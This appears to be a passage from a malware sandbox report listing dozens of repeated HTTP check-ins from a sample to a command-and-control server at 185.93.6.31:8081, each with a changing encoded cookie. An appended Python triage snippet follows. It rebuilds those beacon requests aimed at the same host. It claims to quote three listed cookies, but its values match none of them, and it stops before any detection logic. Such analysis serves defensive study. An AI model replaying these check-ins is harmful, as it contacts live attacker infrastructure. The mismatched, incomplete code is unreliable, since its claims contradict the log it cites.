          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=NO4zVLkZjESgKuTrHvUUK-KuxQ15HN53y8DQ027uMIqbTcgbOCUeC2mvnnM5hV4wS6u2YBtwlmR5hLdOgiLby-TlNRhbzSQmq8cTrfyehVWCA7P_Ro8G-o-gOhr4kPZDQUBrLQN4Cj4h3sIjzVh2wE-gckbV7Pu8gJH4-QEhjEhWQ1V7User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=92pnD3uSZd9gQDTITZ5X56ymyPFflq7YbFvI7pC0J8AX6vrbCznTRzjApulXoVIKj8aPodG-0HYrHmfQOA0aZ_j9Qs2TP_m13NgQ4ZdcBEkHoJ_VY0F8PYXTFtOk0CXrB1W-Q56wcDLQgxGT2KeIsAb6VApvc1gdGh0YaFP7EuLxJRlDUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wUIBGWQrdbdmd4sYK8wW0JYFtzs2H-6GQaDIq-ShDq2yqIdoUdXxgoN9bJpeP0PV7N488x_kkh3Ex2DzvIcIetvr_Z71gj-3fVzHmEQ5z0_riuQN9c8n48l4gdBeB03oNB0lDoFO97NfhGIfNt1wsXDzXTN8XPXvUfb69R5R3qivH0j5User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=2KzkdVVbW2VMaDPK8rfDCg7sEiyVXglWJ4IH8oKs56t3Dx861GfJKoXtSVLVx4kRp-lhQfcyQUWVxmBvbmAM6gin4jm3j_MHR4XEjBDcUnRuQWTeqs3R22Pi7TsU0iFirQK8DO863R_NnBUCIRqh4aPipWc5riydbNMv2O1jW2m6AYJaUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=6xT-pWfs_HV8Pq1iUeDOTbDYUVtD6DdycCVRRIzKvmoLlGNxF0dK7SS-P0NL38ugk7gWC83ASdw3YP56JHODzeSD22ePQWAfwKaJS4sineMb3gZ_fz_ll5mtj3m4rrxBGysn6YLO6ZjM_Yg5xNkRGhqEzaBzDcG3BmOBwk-Fi0jtW4DpUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=7OY85EmPSEpL07blBmgrLbuhisYbu9N7bAT1VskFM1CfDLqVfHHMf67ZUWdzm34owXoBDjJAr-DpY10OkSM1h_ZPwGPYJgJKUPj6ZWmd8rLGLtnw2GsaHuTcvC1zo3AVGbkY86zqyk5yIF_iG3lNTF1XYM5R-MgSfFLHCDP141WCu3UEUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xB6RwEnpLtBQ2kZ_7gW2vxJeZ5mJ7HzjOzByR54ekh5rvWqPyNW8n5lfPOfJdfyku1sU9OuANPCJdBXactJ5XxQVl4yrPYayWzexOQxuJ8Fy8xFrtn-kbn9QmI4IYFTXsbDJufOIqKrRLmC3PajUVL9Q0NIlHFkocGFabfHRLtyms_fvUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=23bv4FeO7TBMXLwnYYLfCIC6QB5ziiY3QEdAAbyory879nI0JyVbqBTcLgZ7vdrlo9oHTv2iWJkHAu8_FBGSiNThyiK_I3Fa8MSYDrtAjKYrvBc6T1300qnPnjyIzK0EK0k2rLKs-N38n5l89LsAXyrm3OVDb9DyNgGQh3_nmg3dOZGsUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=gxJkDCZ7EKIkJ-4NaZxzxdRV0i50T4uTA_Ctvqbxa7jw-OJ9E4WUl8EtCY8cbybAro5Z5l209wiGlwXm_tdtb5m7mIu30lqiPwyijQZpqlqp2oEYt59C9oso5MUcVyj9dk1AG8MekqYd1AcKdI0VpDKjOCY-DJD6E6af4FwBu73tTy3sUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=WCtMTtXc817M75vxcjBrMY5ruhcV2aFtpwWvyQIrT5D3iLcBVOBhEQVq4WlVQCEqJ27Jene16X4VQchU7uek0YggSgI3CFs8xwJst5Bb-k_uxszlKkp54ONlRQCUVYlZLYUUN2-9dSRNG705oZ0J2iNlDVy5KYSm7FSH423k81I6hiphUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=1IRqMVh8aOFDrjn2bnBa2Y9Ixc98eKPmT7XF0LNaKv40BPflKNfeeRsuq9d0T180rCiCn_JQ3UgI8GruG-MXWdsTT_Ow0fSL_zYd37SyCXckTpLrQK9xA6Y9G-2HPijVJLuzfb1efQzzbRyt-0mFjiUUWTRMnVUjOfMVVnAVH9zSyxR9User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=LCNUaYlKIMeLFt5oxq1DoHtk4kvbfrv2rMGd2wnAW91fydIYvLSk8m4cOeqzXhalAb9pg_KFx20ppjWDUeZdCjaKqO4Y42rHkD2S6KlYmj8G67F9GK5ykyQZ1KCzZhiY2XxwfmwvosOy5Tdv27wlwZ2SCEORPaCfvJevhfMwi9hCfh2JUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wvwn9k8LmOZWOPBJ6OcAiRS80a-PDsrVPdLEcZj8JChtX9y5zjcKqZ-9itHPl0qSvbmiwu1igsaPlqPsdDDPaRL3Ibqt3zCEXdUHDwqMkfd0EaddsJ0SWHmyLrgOguLht1J_j_VqHpzXzNaBO0piYrmyZuQj_u8edoPsW_czmOqgUUHZUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=F3tSopuDUHKAUQFlrY9iSky3_Vy_h5t1jEr9Q3ClEm33-8926yjm6tjRk0S3sGenb9e6DDGv5dvLD1J92Bwvyhjsd2BzLswYPMklTHdNMeTnsap4g1BJkGXCI35EwRBG50SL7n6hRZ8wkiQ-OLa9HebrYaePYm2w-gwtxbPqJ08RNCzuUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=MwlQXZZgJPOUPNpc2YdHlGRO5n_EVL_Cs-uZ7xbqX-lA49Yso56gxnE2Pd6sdBKRHpVtt-2vw1k2jDG3TsxZPimgrNoHyW7zjxeW3LZyngsZwbVJB4R2pzsz0JSsTBysxlZ0SnMFpvetzzNbxJYh9YK4DHeOF6Sro72rsewaj-xdVBm9User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=VumxgtoRs1LBw-JF7B2Bag0lHnz-FXhVzdgeYzE38U22aSxWqroFyplDcGT2IoSHLkVZLHA9BvuKnbFdmY7M6ll-lEAyvC84fVvGbDbf0sSmI0lYwsKqsCRQwF4FU_NmptZozj8zpr9xAMceeSRePad5gofO8I6Qu57O5fJ4xG9Qps_OUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=cSQEdPzTu2Tl4NPLWz8jC6dk8i081ulXjgrn8yskB6reh_87fe8pKyxlqVN8T2kQDmGBQF66oUQ8ToBux-js66EvAjgeBxMG7g0kjblUsnXHyYTfA0Ux2spqDTq9WsFjBIpcDUayPR5kFPUDiJJB4ApqRWaQJsycxVvP2UTru2gTiWJbUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=njlWhztQIik5DNyGdLdBTsl-4KVpZLkYHtufNbvaWTPt09D2Dq6mHNwGOwQBRBRLs6VrbUCfxYObvDdt4_xf5ISQqgCq-WgpIieQBhtCmNG08bOTqrRwfZYD1k4BfBp2a2ZykN41oC0A_zWBaaYnLy-ICq0jJ6JxDo2ta0EqiTbwZB9nUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=v57xvjJpTq4rWiYBlYXWwWneB-fybBydQLASOeWe8mAQPQrxs1Xc4eLfXJmy9ZzawNt0ipAAVI7y9HWkCVIZIW-V9_LQvebMILfRR3fuR78Jc3EVzf_EEATQ-PBz4DSpyjCpx4gIyNSqrgDJRii0KsTQsKxenDlWC-E6E4pRTqLdM5eRUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=zv9990IHfydZ1S4wdAtNH5Uz0glmA7QgVc7SFqkhPTguf-AjMqzJvwFVvBFuNEjytlOVWegryo4Si30oAZgAn8FoWDWqquNN5U0KGa7JHrE-NYUtWtRmxbxGDCudRT8TPsCku6clasrpFgtr4TKSSD9vTvJW5kLlI4gCkGpuCBrIsAO7User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=a3l4b84QDMHMTPJugfdvpjw-zk2cJJfw65ux3U6ad9sYk_4e--6I9ClGFez0BDqjRuVFhbXf62tu_BmFFrxxDHHQhOhfuUbB12e-7u4CtjlBsZ17X_RelWND-Kb0PDSeniZceCt1jsX1vxtpnOYJx9rIJEXWZ4yZ-82Dg7Rqp94FJDGPUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wazc5UxbY_VVaAta67f7mhfsKryMXjHGPoI_Ypus3ztuDyeqzWfxupztccLMx7GBvulZ0e4yedWMxlj_d2A0ehGn2qmuj8uXXoX8HAncauR3QVxOs83pS3ri1asN0hnytAKEnPY65Y_UnC2SOBqZcbrinfcgrhQNddMXSPRjY_mjAbrKUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xHFrq0iJaXtTWzhsfoVbQ5-9xFVsjaJ8X0DESqOvK2Qk8fZ_OCLf4wvbqk1kul6uvN2DBeKl3NIYBWt0CxYWw8vmTmmgJPUR78McRaRHCO00u5NxUFpwmbbIGneXyylPNE6y562rfJbjmB0367yEFDXhWK5caFS5KQYUzGDgHkbCPhXnUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fb4kWdjXUPfai65YlzAzkCr5knuK48vG_Vzt61hdK-0OVKIo7SnUwj-BSdriw2aVUCIZs6MYt114O0WzAHstOmcX2N5Jfhr3waDi2PjF6g9XdsFNSTMCo3WEpJDi-2ioiOEATj2y0vPjeEdfiiFV8cwPeHPAoNCv7QrftaKt--gT4225User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qy64ZifWurY8BOuhEdqIjvDiF5gD0nGxMB8Xh8zw-KlLriWyV30MLmSEeYAL5Y1j04JQyI36Dx93Wri5ZEnFDqS5naTPeybcgJzPiMsY2yBb5EC8PwWjVNmXybr4lPqCWxFhKsL0r1uMx876hONX2Vq-i2MzN4d0RlnHAQ-_zYutYcYqUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=r_odTyINol87PsrwheE6MHm66xbiCPBsUNT-yPX6HpEAWeYAozEwEPK7sGiikXAr0L-Ye4BkuH_ikJlVGTb10H_xGwPA2Qo9MNM9tmeKq04ZF53k3Zso4RS0FAFjhNhY2lRFNphsJCW6yuw4VkxY29S0XF1O-NWnG4XW4po1olPNV3tgUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xSBMbWBJOMNiFcZsL65bpJJn-k8yfaPyRcKF3-DDQ9m2ysocVbe89ocfIe5aXQ6h6LxxhxuG32nApS2HuOVFDt-JsOrx4HLDeT6K7EBbgjvv6Kl58a1ql80azKRaZQCcMH9oeoUsusdb5i9rMr89xXSREEd4PribVZS3gRozk9yrfQWNUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=V7L_yNtK_RjAmKwP7UbPIAx-UDb_TjYfzINQKTBsvwe3MmIcq-FLgJgYPi73ecrNLx4XZnFmSLGLxv8XmNWCoFgl2goz52FyfACIJjeEnI6neAcSw5nk-iULjhQECL0sp40mhD5o6PVwW4lUeH8Qd6YizM3Pq8DausWAr_MjiiVR_YGEUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=LM835qE4iPa4C-BZBtQQmfqPwb9hPdrF0-HUYXbPNDiDbMypIAQauXGOmsEhpFqCU4qy0gNRktZhpbP8mgPfefzEMapD7CCUs-YXH-S_geeaIrdNXq4CSJeBPqjgsfLxWWFvnxtZDow5_8aR1XlycleBdvTNzf8OmLD8SxkAiPpOYlHJUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=GfTawrydrmy-wVDD83rNC06zbODuqTVdmRYTcDwX1XZqHlyziWMqWVvLt0GGiZgONGjnKMdSScYccbsoZDHToQNdJkUtNORspeocQ5yPFJQzPD_WLXn8OBHOWguGsZYz7Kv-1Vn4LGiHMrnE7muraqhFhuik6i40iUAhLsbnBXN3qZMiUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=aE_wOOS38uj_ZaP_0rvA0DODX8bAsznv835f2Q-RsPeIz23slBxEcKflMd7IhMU9EOMYlk6bR0G0O_DnpyiNUGfY1foMGm6CQ_2H1gh5k36YhQji_GTrChr2geQ79bLcmHApdAGV5wVPpoakR4Ifh5nfwz3wVs8qhTiPX8zehdVuAI50User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rYKwfiB1D245RmfBh5mXAXvCRifgcF1dUqxT-feCs6ACIUsxoUmdIfDDHVmg6d0a0sc1SoIcFU7g6DRkG05Y4X2JtjLCoacMMquQh2XyBn8bbzDV3-OF0BbMuTBh_HVp2CzoB5oUiRS4skEJVDT16tbM8WxMgHiWGf1705hND2LPL9ZRUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=tbLArRDbtAMSh0qsXzzXZOL1do9C7y8yNVAJH5BRzxnGWEbcJSUwNveNrS4qz4JhmC79R2sUU6mwN6FHyHfJzq8bPCqBcv4DCawGLDDJDvufeiW5gT_mV72IQGQq94xcQO3kuvW-NgcrdKOrQi2xBQQDnIcIrDRbJQY7QWqhHxzb74lNUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
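The check-ins above, as an added triage example (not code from this report, from the sandbox vendor or from the sample's author): it rebuilds three of the listed requests in wire format, parses them and flags the traits that make the traffic recognisable as beaconing: plain HTTP to a non-standard port, one fixed URI fetched over and over, and a Cookie whose value changes on every request yet always decodes to the same number of bytes (the listed values are 176 base64url characters each, i.e. 132 bytes). Host, port, path, header set and the three cookie values are taken from the report; the parser, the flag names and the 5.0 bits-per-character entropy threshold are this example's own choices.

```python
import base64
import binascii
import math
from collections import Counter

# Three of the check-ins listed above, rebuilt one header per line as they
# travel on the wire. Only the Cookie value differs between them.
COOKIE_NAME = "AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN"
OBSERVED_COOKIES = [
    "n7DjpjrZlwg4hWmndT70b8j3VYRo7Qw5H1IqFLpT7BLsWmXXDycTPd2PjiUAzaFqsizeTEEWcKKaNYJM4nXqxYUZHyGrcN0II64lJxrLLfC1eAayqz3FXJeKY28A9a9Xau_Hsd-8FQwBdoCgaC-SDi4Bv4wirhdQDwQYSkCjPBfx7apG",
    "ykuj-0e8HOtej3RE4FCEhBwLVaKHuU7YNWVAfJBLoCVl6Fi0xoCOpJcKDtzHIM6ftQ4mz-XVBsuHISfhfIdLZBpApbelaLSJVWKDAgI7Ffp8piNQuCqWVXEFqrUGNWbsv-X7gv3dmpHfe1KMM_3mb7EF4ukrSWsTfjRoVv-EHOeo5sXU",
    "zTRrtkHMaWZaHjhxd8BbXpb4xEhlyKJhVgXEV6rqK3kttPZiMWff_gKeqlBt_16ztZiDGOvg3M8RQGtpAlMW3sKjTnSpYfUM5oYcWK0CCPA9_pNsWR9whL-NGmqejilSPQuy-qTufIvq3R0q4vmECTykWLNVLVSkIEMU0WmlHlvLexX6",
]
USER_AGENT = ("Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36")


def build_request(cookie_value, host="185.93.6.31", port=8081,
                  path="/Calculate/team/WIQK6GMJ"):
    """One check-in in wire format; defaults are the values the report observed."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        "Accept: application/xhtml+xml, image/*, application/xml\r\n"
        "Accept-Language: es-do\r\n"
        "Accept-Encoding: *, compress\r\n"
        f"Cookie: {COOKIE_NAME}={cookie_value}\r\n"
        f"User-Agent: {USER_AGENT}\r\n"
        f"Host: {host}:{port}\r\n"
        "Connection: Keep-Alive\r\n"
        "Cache-Control: no-cache\r\n"
        "\r\n"
    )


SAMPLE_REQUESTS = [build_request(c) for c in OBSERVED_COOKIES]


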